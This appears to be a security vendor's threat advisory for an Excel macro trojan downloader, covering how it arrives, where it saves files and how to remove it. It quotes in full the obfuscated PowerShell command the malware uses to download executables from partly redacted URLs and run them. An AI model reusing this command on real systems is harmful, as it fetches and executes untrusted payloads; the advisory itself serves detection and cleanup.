X2KM_DLOADR.YYSXQ
Trojan-Downloader.MSExcel.Agent.fh (Kaspersky); X97M.Downloader.CW (Bitdefender)
Windows
Threat Type: Trojan
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
Spammed via email, Dropped by other malware, Downloaded from the Internet
This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
As of this writing, the said sites are inaccessible.
TECHNICAL DETAILS
59,904 bytes
XLS
No
06 Jul 2017
Connects to URLs/IPs, Downloads files
Arrival Details
This Trojan arrives as an attachment to email messages spammed by other malware/grayware or malicious users.
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Download Routine
This Trojan connects to the following website(s) to download and execute a malicious file:
- http://{BLOCKED}yk.com/vol.exe
- http://{BLOCKED}p.com/news.exe
It saves the files it downloads using the following names:
- %Application Data%\{random numbers}.exe
where {random numbers} can be randomly generated from 0 to 61132
(Note: %Application Data% is the Application Data folder, where it usually is C:\Documents and Settings\{user name}\Application Data on Windows 2000, Windows Server 2003, and Windows XP (32- and 64-bit); C:\Users\{user name}\AppData\Roaming on Windows Vista (32- and 64-bit), Windows 7 (32- and 64-bit), Windows 8 (32- and 64-bit), Windows 8.1 (32- and 64-bit), Windows Server 2008, and Windows Server 2012.)
As of this writing, the said sites are inaccessible.
Other Details
This Trojan does the following:
- It uses the following powershell command for its download routine:
powErshell.exe -nOl -NoNiNt -WIndOws 1 -NoprOFIle -exEcu BYpaSs -Wi 1 -NOPr $random = New-Object System.Random; Foreach($um in @({http://{BLOCKED}yk.com/vol.exe},{http://{BLOCKED}p.com/news.exe})) { try { $fg = $random.next(0, 61132); $pp = '%appdata%\' + $fg + '.exe'; (new-object system.net.webclient).DownloadFile($um.ToString(), $pp); Start-Process $pp; break; } catch { Write-Host $error[0].Exception } }
NOTES:
The Microsoft Excel file contains the following fake details luring users to enable macro content:
SOLUTION
9.850
13.516.05
06 Jul 2017
13.517.00
07 Jul 2017
Step 1
Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Search and delete these files
- %Application Data%\{random numbers}.exe
Step 4
Scan your computer with your Trend Micro product to delete files detected as X2KM_DLOADR.YYSXQ. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Step 5
Enable the macro virus protection in Microsoft Office Applications
Did this description help? Tell us how we did.